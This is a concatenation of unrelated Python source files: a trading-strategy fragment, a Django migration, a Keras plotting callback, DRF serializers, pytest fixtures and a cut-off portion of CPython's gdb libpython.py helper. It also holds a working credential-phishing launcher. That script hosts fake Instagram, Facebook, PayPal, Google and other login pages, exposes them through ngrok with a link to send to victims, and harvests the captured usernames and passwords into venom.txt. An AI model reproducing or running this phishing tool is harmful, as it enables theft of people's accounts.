        """ Market kline (candlestick) update
"""
        # Loop over the models to pull their latest signals
        for model in self.models:
            await model.on_kline_update_callback(kline)
        # Consolidate the models and refresh the target position
        self.model_consolidation()
        # Place orders based on the delta position
        await self.submit_orders(self.delta_position)
    async def on_asset_update_callback(self, asset: Asset):
        """ Account asset update
"""
if not self.init_assets:
            self.init_assets = copy.deepcopy(asset.assets) # initial asset snapshot, captured only once
        # Compute the current holdings relative to the initial snapshot
for coin in self.coins:
self.current_position[coin] = asset.assets[coin]["total"] - self.init_assets[coin]["total"]
@abstractmethod
    async def submit_orders(self, delta_position):
        """ Execute order placement according to the latest self.delta_position
""" |
py | 7df7c83ee34ac615e9551017115e82c475cd5e40 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-08-11 20:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('stats', '0002_auto_20151109_0319'),
('regions', '0006_auto_20170216_1730'),
]
operations = [
migrations.CreateModel(
name='RegionCohorts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gender', models.CharField(blank=True, choices=[('Female', 'Female'), ('Male', 'Male')], max_length=30, verbose_name='Gender')),
('ethnicity', models.CharField(blank=True, choices=[('White', 'White'), ('Hispanic', 'Hispanic'), ('African American', 'African American'), ('Others', 'Others')], max_length=30, verbose_name='Ethnicity')),
('economic_status', models.CharField(blank=True, choices=[('Economically Disadvantaged', 'Economically Disadvantaged'), ('Not Economically Disadvantaged', 'Not Economically Disadvantaged')], max_length=30, verbose_name='Economic status')),
('enrolled_8th', models.IntegerField(null=True)),
('enrolled_9th', models.IntegerField(null=True)),
('enrolled_9th_percent', models.FloatField(null=True)),
('enrolled_10th', models.IntegerField(null=True)),
('enrolled_10th_percent', models.FloatField(null=True)),
('lessthan_10th_enrolled', models.IntegerField(null=True)),
('lessthan_10th_enrolled_percent', models.FloatField(null=True)),
('graduated', models.IntegerField(null=True)),
('graduated_percent', models.FloatField(null=True)),
('enrolled_4yr', models.IntegerField(null=True)),
('enrolled_4yr_percent', models.FloatField(null=True)),
('enrolled_2yr', models.IntegerField(null=True)),
('enrolled_2yr_percent', models.FloatField(null=True)),
('enrolled_out_of_state', models.IntegerField(null=True)),
('enrolled_out_of_state_percent', models.IntegerField(null=True)),
('total_enrolled', models.IntegerField(null=True)),
('total_enrolled_percent', models.FloatField(null=True)),
('enrolled_wo_record', models.IntegerField(null=True)),
('enrolled_wo_record_percent', models.FloatField(null=True)),
('total_degrees', models.IntegerField(null=True)),
('total_degrees_percent', models.FloatField(null=True)),
('bacc', models.IntegerField(null=True)),
('bacc_acc', models.IntegerField(null=True)),
('bacc_cert', models.IntegerField(null=True)),
('assoc', models.IntegerField(null=True)),
('accoc_cert', models.IntegerField(null=True)),
('cert', models.IntegerField(null=True)),
('region', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cohorts', to='regions.Region')),
('year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='region_cohorts', to='stats.SchoolYear')),
],
options={
'verbose_name_plural': 'Region cohorts',
},
),
migrations.AlterUniqueTogether(
name='regioncohorts',
unique_together=set([('region', 'year', 'gender', 'ethnicity', 'economic_status')]),
),
]
|
py | 7df7c86843d13725911d08b146a9c1e23b9058df | import matplotlib.pyplot as plt
import keras
# save loss, acc
class LossHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.losses = {'batch': [], 'epoch': []}
self.accuracy = {'batch': [], 'epoch': []}
self.val_loss = {'batch': [], 'epoch': []}
self.val_acc = {'batch': [], 'epoch': []}
def on_batch_end(self, batch, logs={}):
self.losses['batch'].append(logs.get('loss'))
self.accuracy['batch'].append(logs.get('acc'))
self.val_loss['batch'].append(logs.get('val_loss'))
self.val_acc['batch'].append(logs.get('val_acc'))
def on_epoch_end(self, batch, logs={}):
self.losses['epoch'].append(logs.get('loss'))
self.accuracy['epoch'].append(logs.get('acc'))
self.val_loss['epoch'].append(logs.get('val_loss'))
self.val_acc['epoch'].append(logs.get('val_acc'))
def loss_plot(self, loss_type):
iters = range(len(self.losses[loss_type]))
plt.figure()
# acc
plt.plot(iters, self.accuracy[loss_type], lw=1.5, color='r', label='train acc', marker='.', markevery=2,
mew=1.5)
# loss
plt.plot(iters, self.losses[loss_type], lw=1.5, color='g', label='train loss', marker='.', markevery=2, mew=1.5)
if loss_type == 'epoch':
# val_acc
plt.plot(iters, self.val_acc[loss_type], lw=1.5, color='b', label='val acc', marker='.', markevery=2,
mew=1.5)
# val_loss
plt.plot(iters, self.val_loss[loss_type], lw=1.5, color='darkorange', label='val loss', marker='.',
markevery=2, mew=1.5)
plt.grid(True)
plt.xlim(-0.1, 10)
plt.ylim(-0.01, 1.01)
plt.xlabel(loss_type)
plt.ylabel('ACC-LOSS')
plt.legend(loc="center right")
plt.savefig("acc_loss.pdf")
plt.show()
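# A minimal usage sketch, not part of the original module: a toy dense model on
# random data, assuming a Keras version whose training logs use the 'acc' and
# 'val_acc' keys that this callback reads.
if __name__ == '__main__':
    import numpy as np
    from keras.models import Sequential
    from keras.layers import Dense

    x = np.random.rand(200, 10)
    y = (np.random.rand(200) > 0.5).astype('float32')

    model = Sequential([Dense(16, activation='relu', input_shape=(10,)),
                        Dense(1, activation='sigmoid')])
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

    history = LossHistory()
    model.fit(x, y, epochs=5, validation_split=0.2, callbacks=[history])
    history.loss_plot('epoch')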
|
py | 7df7c86cf18661897592d9456cc956c0e82cec83 | from rest_framework import serializers
from goods.models import SKU
class CartAddSerializer(serializers.Serializer):
sku_id = serializers.IntegerField()
count = serializers.IntegerField(min_value=1)
selected = serializers.BooleanField(required=False)
def validate_sku_id(self, value):
count = SKU.objects.filter(pk=value).count()
if count <= 0:
            raise serializers.ValidationError('Invalid SKU id')
return value
class CartSerializer(serializers.ModelSerializer):
count = serializers.IntegerField()
selected = serializers.BooleanField()
class Meta:
model = SKU
fields = ['id', 'name', 'price', 'default_image_url', 'count', 'selected']
class CartDeleteSerializer(serializers.Serializer):
sku_id = serializers.IntegerField()
def validate_sku_id(self, value):
count = SKU.objects.filter(pk=value).count()
if count <= 0:
            raise serializers.ValidationError('Invalid SKU id')
return value
class CartSelectSerializer(serializers.Serializer):
selected = serializers.BooleanField()
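# A minimal usage sketch, not part of the original module: it assumes a SKU
# with pk=1 exists in the database; the count and selected values are illustrative.
def example_cart_add_validation(data=None):
    data = data or {'sku_id': 1, 'count': 2, 'selected': True}
    serializer = CartAddSerializer(data=data)
    serializer.is_valid(raise_exception=True)
    return serializer.validated_data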
|
py | 7df7c8e068f80e9079c65dff6f77fa602daa647b | import pytest
from functools import partial
from diplomas.services import DiplomaGenerator
@pytest.fixture
def student(mixer):
return mixer.blend('users.User', first_name='Овир', last_name='Кривомазов', gender='male')
@pytest.fixture
def course(mixer):
return mixer.blend('products.Course')
@pytest.fixture
def order(factory, course, student):
return factory.order(user=student, item=course, is_paid=True)
@pytest.fixture
def template(mixer, course):
return mixer.blend('diplomas.DiplomaTemplate', slug='test-template', course=course, language='ru')
@pytest.fixture
def generator(course, student):
return partial(DiplomaGenerator, course=course, student=student)
|
py | 7df7c8f7b9515b18b4c998e2850abeb0f4a86bae | from setup.colors import ran , r, c, y,lg , g , w
p = ran
from setup.sprint import sprint
from setup.banner import banner , clear , banner2
import random
import time , os , sys
clear()
banner()
try:
import requests
import colorama
except ModuleNotFoundError:
os.system("pip install colorama")
os.system("pip install requests")
def command(str):
os.system(str)
def error(str):
print(f"{y}[{r}!{y}] {lg}{str}")
def internet():
try:
res = requests.get("https://google.com")
if res.status_code == 200:
error("Internet connection found.")
elif res.status_code == 400:
error("Internet connection not found")
exit()
except KeyboardInterrupt:
error(f"{r}[{c}!{r}] {p} Exiting -----> ")
exit()
except:
print(f"{r}[{c}!{r}] {y} Please on your internet connection")
internet()
def mkdir():
try:
os.makedirs("cache")
except FileExistsError:
pass
except Exception:
error("Failed...")
mkdir()
def userDATA(site):
while True:
if os.path.exists(f"cache/{site}/userlog.txt"):
error("User data found! ")
os.system(f"cat cache/{site}/userlog.txt")
os.system(f"cat cache/{site}/userlog.txt >> venom.txt")
error(f"{y}[{g}+{y}] {r} Username and password saved into venom.txt")
os.system(f"rm -rf cache/{site}/userlog.txt")
else:
pass
def localHost(site):
path = f"sites/{site}"
des = "cache/"
os.system(f"cp -R {path} {des}")
print("\n")
print(f"{r}[{w}~{r}] {g} Select any\n ")
print(f"{y}[{g}01{y}] {r} Localhost--Random--")
print(f"{y}[{g}02{y}] {r} Localhost--Custom--")
port_ = random.randint(1150, 9999)
l_optn = input(f"{y}[{g}~{y}] {w} Choose option: ")
if l_optn == "1" or l_optn == "01":
os.system(f"php -S 127.0.0.1:{port_} -t cache/{site} > /dev/null 2>&1 & sleep 2")
print(f"{r}[{w}+{r}] {g} Localhost started on http://127.0.0.1:{port_}")
userDATA(site)
elif l_optn == "2" or l_optn == "02":
print()
port_ = int(input(f"{r}[{g}+{r}] {y} Enter a portnumber: "))
os.system(f"php -S 127.0.0.1:{port_} -t cache/{site} > /dev/null 2>&1 & sleep 2")
print(f"{r}[{w}+{r}] {g} Localhost started on http://127.0.0.1:{port_}")
userDATA(site)
else:
error("Invalid option")
exit(0)
def ngrok(server):
try:
path = f"sites/{server}"
des = "pweb/"
os.system(f"cp -R {path} {des}")
print("\n")
port_ = random.randint(1150, 9999)
os.system(f"php -S 127.0.0.1:{port_} -t pweb/{server} > /dev/null 2>&1 & sleep 2")
os.system(f"./ngrok http http://127.0.0.1:{port_} > /dev/null 2>&1 & sleep 8")
os.system(f'echo -ne "Send this link: "')
os.system(f'curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io"')
userDATA(server)
except KeyboardInterrupt:
print()
error(f"{r} _______{g}Exiting{r}______")
time.sleep(2)
sys.exit(1)
def hostOption(site):
print("\n")
print(f"{p}[{g}~{p}] {w} Link generating option")
print()
print(f"{w}[{y}01{w}] {g} Localhost")
print(f"{w}[{y}02{w}] {g} Ngrok")
print()
h_optn = input(f"{r}[{w}×{r}] {y} Choose option: ")
if h_optn == "1" or h_optn == "01":
localHost(site)
elif h_optn == "2" or h_optn == "02":
ngrok(site)
def menu():
print(f"{y}[{g}01{y}] {c} Instagram {y}[{g}11{y}] {c} Dropbox ")
print(f"{y}[{g}02{y}] {c} Facebook {y}[{g}12{y}] {c} ig_follower ")
print(f"{y}[{g}03{y}] {c} Google {y}[{g}13{y}] {c} Yandex ")
print(f"{y}[{g}04{y}] {c} Twitter {y}[{g}14{y}] {c} Origin ")
print(f"{y}[{g}05{y}] {c} Netflix {y}[{g}15{y}] {c} Ebay ")
print(f"{y}[{g}06{y}] {c} Snapchat {y}[{g}16{y}] {c} Pinetrest ")
print(f"{y}[{g}07{y}] {c} Yahoo {y}[{g}17{y}] {c} Linkdin ")
print(f"{y}[{g}08{y}] {c} Github {y}[{g}18{y}] {c} Ebay ")
print(f"{y}[{g}09{y}] {c} Paypal {y}[{g}19{y}] {c} Microsoft ")
print(f"{y}[{g}10{y}] {c} Spotify {y}[{g}20{y}] {c} About me ")
menu()
print("\n")
try:
optn = input(f"{w}[{g}×{w}] {p} Choose an option: ")
except KeyboardInterrupt:
error("Keyboard interrupt")
time.sleep(1)
exit()
if optn == '1' or optn == '01':
hostOption("instagram")
elif optn == '2' or optn == '02':
hostOption("facebook")
elif optn == '3' or optn == '03':
hostOption("google")
elif optn == '4' or optn == '04':
hostOption("twitter")
elif optn == '5' or optn == '05':
hostOption("netflix")
elif optn == '6' or optn == '06':
hostOption("snapchat")
elif optn == '7' or optn == '07':
hostOption("yahoo")
elif optn == '8' or optn == '08':
hostOption("github")
elif optn == '9' or optn == '09':
hostOption("paypal")
elif optn == '10':
hostOption("spotify")
elif optn == '11':
hostOption("dropbox")
elif optn == '12':
hostOption("ig_follower")
elif optn == '13':
hostOption("yandex")
elif optn == '14':
hostOption("origin")
elif optn == '15':
hostOption("ebay")
elif optn == '16':
hostOption("pinetrest")
elif optn == '17':
hostOption("linkedin")
elif optn == '18':
hostOption("snapchat")
elif optn == '19':
hostOption("microsoft")
elif optn == '20':
print(f"{y} I am Saad :-) \n{r}{c} Instagram : https://instagram.com/saadkhan041\n{p} Github : https://github.com/Saadkhan041")
else:
print("\n")
error("Invalid option selected SUCCESSFULLY")
time.sleep(1)
exit()
banner2()
|
py | 7df7c9bd541672fab6ba2679ae0c01d066e79dea | #!/usr/bin/python
'''
From gdb 7 onwards, gdb's build can be configured --with-python, allowing gdb
to be extended with Python code e.g. for library-specific data visualizations,
such as for the C++ STL types. Documentation on this API can be seen at:
http://sourceware.org/gdb/current/onlinedocs/gdb/Python-API.html
This python module deals with the case when the process being debugged (the
"inferior process" in gdb parlance) is itself python, or more specifically,
linked against libpython. In this situation, almost every item of data is a
(PyObject*), and having the debugger merely print their addresses is not very
enlightening.
This module embeds knowledge about the implementation details of libpython so
that we can emit useful visualizations e.g. a string, a list, a dict, a frame
giving file/line information and the state of local variables
In particular, given a gdb.Value corresponding to a PyObject* in the inferior
process, we can generate a "proxy value" within the gdb process. For example,
given a PyObject* in the inferior process that is in fact a PyListObject*
holding three PyObject* that turn out to be PyBytesObject* instances, we can
generate a proxy value within the gdb process that is a list of bytes
instances:
[b"foo", b"bar", b"baz"]
Doing so can be expensive for complicated graphs of objects, and could take
some time, so we also have a "write_repr" method that writes a representation
of the data to a file-like object. This allows us to stop the traversal by
having the file-like object raise an exception if it gets too much data.
With both "proxyval" and "write_repr" we keep track of the set of all addresses
visited so far in the traversal, to avoid infinite recursion due to cycles in
the graph of object references.
We try to defer gdb.lookup_type() invocations for python types until as late as
possible: for a dynamically linked python binary, when the process starts in
the debugger, the libpython.so hasn't been dynamically loaded yet, so none of
the type names are known to the debugger
The module also extends gdb with some python-specific commands.
'''
# NOTE: some gdbs are linked with Python 3, so this file should be dual-syntax
# compatible (2.6+ and 3.0+). See #19308.
from __future__ import print_function
import gdb
import os
import locale
import sys
if sys.version_info[0] >= 3:
unichr = chr
xrange = range
long = int
# Look up the gdb.Type for some standard types:
# Those need to be refreshed as types (pointer sizes) may change when
# gdb loads different executables
def _type_char_ptr():
return gdb.lookup_type('char').pointer() # char*
def _type_unsigned_char_ptr():
return gdb.lookup_type('unsigned char').pointer() # unsigned char*
def _type_unsigned_short_ptr():
return gdb.lookup_type('unsigned short').pointer()
def _type_unsigned_int_ptr():
return gdb.lookup_type('unsigned int').pointer()
def _sizeof_void_p():
return gdb.lookup_type('void').pointer().sizeof
# value computed later, see PyUnicodeObjectPtr.proxy()
_is_pep393 = None
Py_TPFLAGS_HEAPTYPE = (1 << 9)
Py_TPFLAGS_LONG_SUBCLASS = (1 << 24)
Py_TPFLAGS_LIST_SUBCLASS = (1 << 25)
Py_TPFLAGS_TUPLE_SUBCLASS = (1 << 26)
Py_TPFLAGS_BYTES_SUBCLASS = (1 << 27)
Py_TPFLAGS_UNICODE_SUBCLASS = (1 << 28)
Py_TPFLAGS_DICT_SUBCLASS = (1 << 29)
Py_TPFLAGS_BASE_EXC_SUBCLASS = (1 << 30)
Py_TPFLAGS_TYPE_SUBCLASS = (1 << 31)
MAX_OUTPUT_LEN=1024
hexdigits = "0123456789abcdef"
ENCODING = locale.getpreferredencoding()
EVALFRAME = '_PyEval_EvalFrameDefault'
class NullPyObjectPtr(RuntimeError):
pass
def safety_limit(val):
# Given an integer value from the process being debugged, limit it to some
# safety threshold so that arbitrary breakage within said process doesn't
# break the gdb process too much (e.g. sizes of iterations, sizes of lists)
return min(val, 1000)
def safe_range(val):
# As per range, but don't trust the value too much: cap it to a safety
# threshold in case the data was corrupted
return xrange(safety_limit(int(val)))
if sys.version_info[0] >= 3:
def write_unicode(file, text):
file.write(text)
else:
def write_unicode(file, text):
# Write a byte or unicode string to file. Unicode strings are encoded to
# ENCODING encoding with 'backslashreplace' error handler to avoid
# UnicodeEncodeError.
if isinstance(text, unicode):
text = text.encode(ENCODING, 'backslashreplace')
file.write(text)
try:
os_fsencode = os.fsencode
except AttributeError:
def os_fsencode(filename):
if not isinstance(filename, unicode):
return filename
encoding = sys.getfilesystemencoding()
if encoding == 'mbcs':
# mbcs doesn't support surrogateescape
return filename.encode(encoding)
encoded = []
for char in filename:
# surrogateescape error handler
if 0xDC80 <= ord(char) <= 0xDCFF:
byte = chr(ord(char) - 0xDC00)
else:
byte = char.encode(encoding)
encoded.append(byte)
return ''.join(encoded)
class StringTruncated(RuntimeError):
pass
class TruncatedStringIO(object):
'''Similar to io.StringIO, but can truncate the output by raising a
StringTruncated exception'''
def __init__(self, maxlen=None):
self._val = ''
self.maxlen = maxlen
def write(self, data):
if self.maxlen:
if len(data) + len(self._val) > self.maxlen:
# Truncation:
self._val += data[0:self.maxlen - len(self._val)]
raise StringTruncated()
self._val += data
def getvalue(self):
return self._val
class PyObjectPtr(object):
"""
Class wrapping a gdb.Value that's either a (PyObject*) within the
inferior process, or some subclass pointer e.g. (PyBytesObject*)
There will be a subclass for every refined PyObject type that we care
about.
Note that at every stage the underlying pointer could be NULL, point
to corrupt data, etc; this is the debugger, after all.
"""
_typename = 'PyObject'
def __init__(self, gdbval, cast_to=None):
if cast_to:
self._gdbval = gdbval.cast(cast_to)
else:
self._gdbval = gdbval
def field(self, name):
'''
Get the gdb.Value for the given field within the PyObject, coping with
some python 2 versus python 3 differences.
Various libpython types are defined using the "PyObject_HEAD" and
"PyObject_VAR_HEAD" macros.
In Python 2, this these are defined so that "ob_type" and (for a var
object) "ob_size" are fields of the type in question.
In Python 3, this is defined as an embedded PyVarObject type thus:
PyVarObject ob_base;
so that the "ob_size" field is located insize the "ob_base" field, and
the "ob_type" is most easily accessed by casting back to a (PyObject*).
'''
if self.is_null():
raise NullPyObjectPtr(self)
if name == 'ob_type':
pyo_ptr = self._gdbval.cast(PyObjectPtr.get_gdb_type())
return pyo_ptr.dereference()[name]
if name == 'ob_size':
pyo_ptr = self._gdbval.cast(PyVarObjectPtr.get_gdb_type())
return pyo_ptr.dereference()[name]
# General case: look it up inside the object:
return self._gdbval.dereference()[name]
def pyop_field(self, name):
'''
Get a PyObjectPtr for the given PyObject* field within this PyObject,
coping with some python 2 versus python 3 differences.
'''
return PyObjectPtr.from_pyobject_ptr(self.field(name))
def write_field_repr(self, name, out, visited):
'''
Extract the PyObject* field named "name", and write its representation
to file-like object "out"
'''
field_obj = self.pyop_field(name)
field_obj.write_repr(out, visited)
def get_truncated_repr(self, maxlen):
'''
Get a repr-like string for the data, but truncate it at "maxlen" bytes
(ending the object graph traversal as soon as you do)
'''
out = TruncatedStringIO(maxlen)
try:
self.write_repr(out, set())
except StringTruncated:
# Truncation occurred:
return out.getvalue() + '...(truncated)'
# No truncation occurred:
return out.getvalue()
def type(self):
return PyTypeObjectPtr(self.field('ob_type'))
def is_null(self):
return 0 == long(self._gdbval)
def is_optimized_out(self):
'''
Is the value of the underlying PyObject* visible to the debugger?
This can vary with the precise version of the compiler used to build
Python, and the precise version of gdb.
See e.g. https://bugzilla.redhat.com/show_bug.cgi?id=556975 with
PyEval_EvalFrameEx's "f"
'''
return self._gdbval.is_optimized_out
def safe_tp_name(self):
try:
return self.type().field('tp_name').string()
except NullPyObjectPtr:
# NULL tp_name?
return 'unknown'
except RuntimeError:
# Can't even read the object at all?
return 'unknown'
def proxyval(self, visited):
'''
Scrape a value from the inferior process, and try to represent it
within the gdb process, whilst (hopefully) avoiding crashes when
the remote data is corrupt.
Derived classes will override this.
For example, a PyIntObject* with ob_ival 42 in the inferior process
should result in an int(42) in this process.
visited: a set of all gdb.Value pyobject pointers already visited
whilst generating this value (to guard against infinite recursion when
visiting object graphs with loops). Analogous to Py_ReprEnter and
Py_ReprLeave
'''
class FakeRepr(object):
"""
Class representing a non-descript PyObject* value in the inferior
process for when we don't have a custom scraper, intended to have
a sane repr().
"""
def __init__(self, tp_name, address):
self.tp_name = tp_name
self.address = address
def __repr__(self):
# For the NULL pointer, we have no way of knowing a type, so
# special-case it as per
# http://bugs.python.org/issue8032#msg100882
if self.address == 0:
return '0x0'
return '<%s at remote 0x%x>' % (self.tp_name, self.address)
return FakeRepr(self.safe_tp_name(),
long(self._gdbval))
def write_repr(self, out, visited):
'''
Write a string representation of the value scraped from the inferior
process to "out", a file-like object.
'''
# Default implementation: generate a proxy value and write its repr
# However, this could involve a lot of work for complicated objects,
# so for derived classes we specialize this
return out.write(repr(self.proxyval(visited)))
@classmethod
def subclass_from_type(cls, t):
'''
Given a PyTypeObjectPtr instance wrapping a gdb.Value that's a
(PyTypeObject*), determine the corresponding subclass of PyObjectPtr
to use
Ideally, we would look up the symbols for the global types, but that
isn't working yet:
(gdb) python print gdb.lookup_symbol('PyList_Type')[0].value
Traceback (most recent call last):
File "<string>", line 1, in <module>
NotImplementedError: Symbol type not yet supported in Python scripts.
Error while executing Python code.
For now, we use tp_flags, after doing some string comparisons on the
tp_name for some special-cases that don't seem to be visible through
flags
'''
try:
tp_name = t.field('tp_name').string()
tp_flags = int(t.field('tp_flags'))
except RuntimeError:
# Handle any kind of error e.g. NULL ptrs by simply using the base
# class
return cls
#print('tp_flags = 0x%08x' % tp_flags)
#print('tp_name = %r' % tp_name)
name_map = {'bool': PyBoolObjectPtr,
'classobj': PyClassObjectPtr,
'NoneType': PyNoneStructPtr,
'frame': PyFrameObjectPtr,
'set' : PySetObjectPtr,
'frozenset' : PySetObjectPtr,
'builtin_function_or_method' : PyCFunctionObjectPtr,
'method-wrapper': wrapperobject,
}
if tp_name in name_map:
return name_map[tp_name]
if tp_flags & Py_TPFLAGS_HEAPTYPE:
return HeapTypeObjectPtr
if tp_flags & Py_TPFLAGS_LONG_SUBCLASS:
return PyLongObjectPtr
if tp_flags & Py_TPFLAGS_LIST_SUBCLASS:
return PyListObjectPtr
if tp_flags & Py_TPFLAGS_TUPLE_SUBCLASS:
return PyTupleObjectPtr
if tp_flags & Py_TPFLAGS_BYTES_SUBCLASS:
return PyBytesObjectPtr
if tp_flags & Py_TPFLAGS_UNICODE_SUBCLASS:
return PyUnicodeObjectPtr
if tp_flags & Py_TPFLAGS_DICT_SUBCLASS:
return PyDictObjectPtr
if tp_flags & Py_TPFLAGS_BASE_EXC_SUBCLASS:
return PyBaseExceptionObjectPtr
#if tp_flags & Py_TPFLAGS_TYPE_SUBCLASS:
# return PyTypeObjectPtr
# Use the base class:
return cls
@classmethod
def from_pyobject_ptr(cls, gdbval):
'''
Try to locate the appropriate derived class dynamically, and cast
the pointer accordingly.
'''
try:
p = PyObjectPtr(gdbval)
cls = cls.subclass_from_type(p.type())
return cls(gdbval, cast_to=cls.get_gdb_type())
except RuntimeError:
# Handle any kind of error e.g. NULL ptrs by simply using the base
# class
pass
return cls(gdbval)
@classmethod
def get_gdb_type(cls):
return gdb.lookup_type(cls._typename).pointer()
def as_address(self):
return long(self._gdbval)
class PyVarObjectPtr(PyObjectPtr):
_typename = 'PyVarObject'
class ProxyAlreadyVisited(object):
'''
Placeholder proxy to use when protecting against infinite recursion due to
loops in the object graph.
Analogous to the values emitted by the users of Py_ReprEnter and Py_ReprLeave
'''
def __init__(self, rep):
self._rep = rep
def __repr__(self):
return self._rep
def _write_instance_repr(out, visited, name, pyop_attrdict, address):
'''Shared code for use by all classes:
write a representation to file-like object "out"'''
out.write('<')
out.write(name)
# Write dictionary of instance attributes:
if isinstance(pyop_attrdict, PyDictObjectPtr):
out.write('(')
first = True
for pyop_arg, pyop_val in pyop_attrdict.iteritems():
if not first:
out.write(', ')
first = False
out.write(pyop_arg.proxyval(visited))
out.write('=')
pyop_val.write_repr(out, visited)
out.write(')')
out.write(' at remote 0x%x>' % address)
class InstanceProxy(object):
def __init__(self, cl_name, attrdict, address):
self.cl_name = cl_name
self.attrdict = attrdict
self.address = address
def __repr__(self):
if isinstance(self.attrdict, dict):
kwargs = ', '.join(["%s=%r" % (arg, val)
for arg, val in self.attrdict.iteritems()])
return '<%s(%s) at remote 0x%x>' % (self.cl_name,
kwargs, self.address)
else:
return '<%s at remote 0x%x>' % (self.cl_name,
self.address)
def _PyObject_VAR_SIZE(typeobj, nitems):
if _PyObject_VAR_SIZE._type_size_t is None:
_PyObject_VAR_SIZE._type_size_t = gdb.lookup_type('size_t')
return ( ( typeobj.field('tp_basicsize') +
nitems * typeobj.field('tp_itemsize') +
(_sizeof_void_p() - 1)
) & ~(_sizeof_void_p() - 1)
).cast(_PyObject_VAR_SIZE._type_size_t)
_PyObject_VAR_SIZE._type_size_t = None
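# Worked example (illustrative only; the numbers are assumptions, not read from
# a real inferior): _PyObject_VAR_SIZE rounds the instance size up to a
# multiple of sizeof(void*). With 8-byte pointers, tp_basicsize=27,
# tp_itemsize=4 and nitems=3:
#     27 + 3*4 = 39  ->  (39 + 7) & ~7 = 40
# i.e. the raw size of 39 bytes is padded up to the next pointer-aligned size.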
class HeapTypeObjectPtr(PyObjectPtr):
_typename = 'PyObject'
def get_attr_dict(self):
'''
Get the PyDictObject ptr representing the attribute dictionary
(or None if there's a problem)
'''
try:
typeobj = self.type()
dictoffset = int_from_int(typeobj.field('tp_dictoffset'))
if dictoffset != 0:
if dictoffset < 0:
type_PyVarObject_ptr = gdb.lookup_type('PyVarObject').pointer()
tsize = int_from_int(self._gdbval.cast(type_PyVarObject_ptr)['ob_size'])
if tsize < 0:
tsize = -tsize
size = _PyObject_VAR_SIZE(typeobj, tsize)
dictoffset += size
assert dictoffset > 0
assert dictoffset % _sizeof_void_p() == 0
dictptr = self._gdbval.cast(_type_char_ptr()) + dictoffset
PyObjectPtrPtr = PyObjectPtr.get_gdb_type().pointer()
dictptr = dictptr.cast(PyObjectPtrPtr)
return PyObjectPtr.from_pyobject_ptr(dictptr.dereference())
except RuntimeError:
# Corrupt data somewhere; fail safe
pass
# Not found, or some kind of error:
return None
def proxyval(self, visited):
'''
Support for classes.
Currently we just locate the dictionary using a transliteration to
python of _PyObject_GetDictPtr, ignoring descriptors
'''
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('<...>')
visited.add(self.as_address())
pyop_attr_dict = self.get_attr_dict()
if pyop_attr_dict:
attr_dict = pyop_attr_dict.proxyval(visited)
else:
attr_dict = {}
tp_name = self.safe_tp_name()
# Class:
return InstanceProxy(tp_name, attr_dict, long(self._gdbval))
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('<...>')
return
visited.add(self.as_address())
pyop_attrdict = self.get_attr_dict()
_write_instance_repr(out, visited,
self.safe_tp_name(), pyop_attrdict, self.as_address())
class ProxyException(Exception):
def __init__(self, tp_name, args):
self.tp_name = tp_name
self.args = args
def __repr__(self):
return '%s%r' % (self.tp_name, self.args)
class PyBaseExceptionObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyBaseExceptionObject* i.e. an exception
within the process being debugged.
"""
_typename = 'PyBaseExceptionObject'
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('(...)')
visited.add(self.as_address())
arg_proxy = self.pyop_field('args').proxyval(visited)
return ProxyException(self.safe_tp_name(),
arg_proxy)
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('(...)')
return
visited.add(self.as_address())
out.write(self.safe_tp_name())
self.write_field_repr('args', out, visited)
class PyClassObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyClassObject* i.e. a <classobj>
instance within the process being debugged.
"""
_typename = 'PyClassObject'
class BuiltInFunctionProxy(object):
def __init__(self, ml_name):
self.ml_name = ml_name
def __repr__(self):
return "<built-in function %s>" % self.ml_name
class BuiltInMethodProxy(object):
def __init__(self, ml_name, pyop_m_self):
self.ml_name = ml_name
self.pyop_m_self = pyop_m_self
def __repr__(self):
return ('<built-in method %s of %s object at remote 0x%x>'
% (self.ml_name,
self.pyop_m_self.safe_tp_name(),
self.pyop_m_self.as_address())
)
class PyCFunctionObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyCFunctionObject*
(see Include/methodobject.h and Objects/methodobject.c)
"""
_typename = 'PyCFunctionObject'
def proxyval(self, visited):
m_ml = self.field('m_ml') # m_ml is a (PyMethodDef*)
ml_name = m_ml['ml_name'].string()
pyop_m_self = self.pyop_field('m_self')
if pyop_m_self.is_null():
return BuiltInFunctionProxy(ml_name)
else:
return BuiltInMethodProxy(ml_name, pyop_m_self)
class PyCodeObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyCodeObject* i.e. a <code> instance
within the process being debugged.
"""
_typename = 'PyCodeObject'
def addr2line(self, addrq):
'''
Get the line number for a given bytecode offset
Analogous to PyCode_Addr2Line; translated from pseudocode in
Objects/lnotab_notes.txt
'''
co_lnotab = self.pyop_field('co_lnotab').proxyval(set())
# Initialize lineno to co_firstlineno as per PyCode_Addr2Line
# not 0, as lnotab_notes.txt has it:
lineno = int_from_int(self.field('co_firstlineno'))
addr = 0
for addr_incr, line_incr in zip(co_lnotab[::2], co_lnotab[1::2]):
addr += ord(addr_incr)
if addr > addrq:
return lineno
lineno += ord(line_incr)
return lineno
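# Worked example for addr2line (hypothetical values, only to illustrate the
# lnotab walk above): with co_firstlineno = 1 and co_lnotab encoding the
# (addr_incr, line_incr) pairs (6, 1) and (8, 2):
#     addrq = 10 -> the first pair moves addr to 6 (not past 10) and lineno to 2;
#                   the second pair pushes addr to 14 > 10, so line 2 is returned.
#     addrq = 20 -> both pairs are consumed and the final lineno, 4, is returned.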
class PyDictObjectPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyDictObject* i.e. a dict instance
within the process being debugged.
"""
